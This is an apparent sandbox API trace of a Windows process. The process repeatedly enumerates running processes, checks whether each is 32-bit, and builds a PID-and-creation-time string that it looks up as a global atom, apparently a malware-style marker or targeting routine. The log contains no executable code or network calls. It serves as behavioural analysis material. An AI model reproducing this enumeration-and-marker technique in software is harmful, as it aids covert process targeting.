	[0102.158] CloseHandle (hObject=0x690) returned 1
	[0102.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0102.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0102.158] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.158] CloseHandle (hObject=0x690) returned 1
	[0102.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0102.159] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.159] CloseHandle (hObject=0x690) returned 1
	[0102.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0102.159] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.159] CloseHandle (hObject=0x690) returned 1
	[0102.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0102.159] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.159] CloseHandle (hObject=0x690) returned 1
	[0102.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0102.159] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.159] CloseHandle (hObject=0x690) returned 1
	[0102.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0102.160] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.160] CloseHandle (hObject=0x690) returned 1
	[0102.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0102.160] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.160] CloseHandle (hObject=0x690) returned 1
	[0102.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0102.160] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.160] CloseHandle (hObject=0x690) returned 1
	[0102.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0102.160] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.160] CloseHandle (hObject=0x690) returned 1
	[0102.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0102.160] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.160] CloseHandle (hObject=0x690) returned 1
	[0102.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0102.161] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.161] CloseHandle (hObject=0x690) returned 1
	[0102.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0102.161] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.161] CloseHandle (hObject=0x690) returned 1
	[0102.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0102.161] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.161] CloseHandle (hObject=0x690) returned 1
	[0102.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0102.161] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.161] CloseHandle (hObject=0x690) returned 1
	[0102.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0102.161] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.161] CloseHandle (hObject=0x690) returned 1
	[0102.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0102.162] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.162] CloseHandle (hObject=0x690) returned 1
	[0102.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0102.162] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.162] CloseHandle (hObject=0x690) returned 1
	[0102.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0102.162] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.162] CloseHandle (hObject=0x690) returned 1
	[0102.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0102.162] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.162] CloseHandle (hObject=0x690) returned 1
	[0102.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0102.162] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.162] CloseHandle (hObject=0x690) returned 1
	[0102.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0102.163] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.163] CloseHandle (hObject=0x690) returned 1
	[0102.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0102.163] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.163] CloseHandle (hObject=0x690) returned 1
	[0102.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.163] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.163] CloseHandle (hObject=0x690) returned 1
	[0102.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.164] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.164] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0102.164] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0102.164] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0102.164] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.165] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0102.165] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.165] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0102.165] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0102.165] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0102.165] CloseHandle (hObject=0x690) returned 1
	[0102.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0102.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0102.166] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.166] CloseHandle (hObject=0x690) returned 1
	[0102.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0102.166] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.166] CloseHandle (hObject=0x690) returned 1
	[0102.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0102.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0102.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0102.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0102.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0102.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0102.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0102.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0102.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0102.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0102.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0102.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0102.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0102.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0102.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0102.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0102.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0102.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0102.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0102.264] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.264] CloseHandle (hObject=0x690) returned 1
	[0102.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0102.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0102.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0102.265] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.265] CloseHandle (hObject=0x690) returned 1
	[0102.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0102.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0102.265] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.265] CloseHandle (hObject=0x690) returned 1
	[0102.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0102.265] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.265] CloseHandle (hObject=0x690) returned 1
	[0102.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0102.265] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.265] CloseHandle (hObject=0x690) returned 1
	[0102.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0102.266] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.266] CloseHandle (hObject=0x690) returned 1
	[0102.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0102.266] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.266] CloseHandle (hObject=0x690) returned 1
	[0102.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0102.266] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.266] CloseHandle (hObject=0x690) returned 1
	[0102.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0102.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0102.266] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.266] CloseHandle (hObject=0x690) returned 1
	[0102.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0102.267] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.267] CloseHandle (hObject=0x690) returned 1
	[0102.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0102.267] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.267] CloseHandle (hObject=0x690) returned 1
	[0102.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0102.267] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.267] CloseHandle (hObject=0x690) returned 1
	[0102.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0102.267] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.267] CloseHandle (hObject=0x690) returned 1
	[0102.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0102.267] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.267] CloseHandle (hObject=0x690) returned 1
	[0102.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0102.268] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.268] CloseHandle (hObject=0x690) returned 1
	[0102.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0102.268] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.268] CloseHandle (hObject=0x690) returned 1
	[0102.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0102.268] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.268] CloseHandle (hObject=0x690) returned 1
	[0102.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0102.268] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.268] CloseHandle (hObject=0x690) returned 1
	[0102.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0102.268] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.268] CloseHandle (hObject=0x690) returned 1
	[0102.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0102.268] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.269] CloseHandle (hObject=0x690) returned 1
	[0102.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0102.269] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.269] CloseHandle (hObject=0x690) returned 1
	[0102.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0102.269] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.269] CloseHandle (hObject=0x690) returned 1
	[0102.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0102.269] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.269] CloseHandle (hObject=0x690) returned 1
	[0102.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0102.269] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.269] CloseHandle (hObject=0x690) returned 1
	[0102.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0102.270] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.270] CloseHandle (hObject=0x690) returned 1
	[0102.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0102.270] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.270] CloseHandle (hObject=0x690) returned 1
	[0102.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0102.270] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.270] CloseHandle (hObject=0x690) returned 1
	[0102.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0102.270] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.270] CloseHandle (hObject=0x690) returned 1
	[0102.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0102.270] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.270] CloseHandle (hObject=0x690) returned 1
	[0102.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0102.271] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.271] CloseHandle (hObject=0x690) returned 1
	[0102.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.271] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.271] CloseHandle (hObject=0x690) returned 1
	[0102.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.271] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.271] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0102.272] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0102.272] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0102.272] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.272] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0102.272] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.273] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0102.273] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0102.273] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0102.273] CloseHandle (hObject=0x690) returned 1
	[0102.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0102.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0102.273] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.273] CloseHandle (hObject=0x690) returned 1
	[0102.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0102.273] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.273] CloseHandle (hObject=0x690) returned 1
	[0102.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0102.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0102.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0102.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0102.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0102.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0102.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0102.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0102.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0102.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0102.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0102.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0102.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0102.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0102.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0102.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0102.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0102.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0102.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0102.532] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.532] CloseHandle (hObject=0x690) returned 1
	[0102.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0102.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0102.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0102.533] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.533] CloseHandle (hObject=0x690) returned 1
	[0102.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0102.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0102.534] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.534] CloseHandle (hObject=0x690) returned 1
	[0102.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0102.534] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.534] CloseHandle (hObject=0x690) returned 1
	[0102.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0102.534] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.534] CloseHandle (hObject=0x690) returned 1
	[0102.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0102.534] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.534] CloseHandle (hObject=0x690) returned 1
	[0102.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0102.534] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.535] CloseHandle (hObject=0x690) returned 1
	[0102.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0102.535] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.535] CloseHandle (hObject=0x690) returned 1
	[0102.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0102.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0102.535] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.535] CloseHandle (hObject=0x690) returned 1
	[0102.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0102.535] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.535] CloseHandle (hObject=0x690) returned 1
	[0102.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0102.536] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.536] CloseHandle (hObject=0x690) returned 1
	[0102.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0102.536] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.536] CloseHandle (hObject=0x690) returned 1
	[0102.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0102.536] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.536] CloseHandle (hObject=0x690) returned 1
	[0102.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0102.536] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.536] CloseHandle (hObject=0x690) returned 1
	[0102.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0102.537] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.537] CloseHandle (hObject=0x690) returned 1
	[0102.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0102.537] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.537] CloseHandle (hObject=0x690) returned 1
	[0102.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0102.537] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
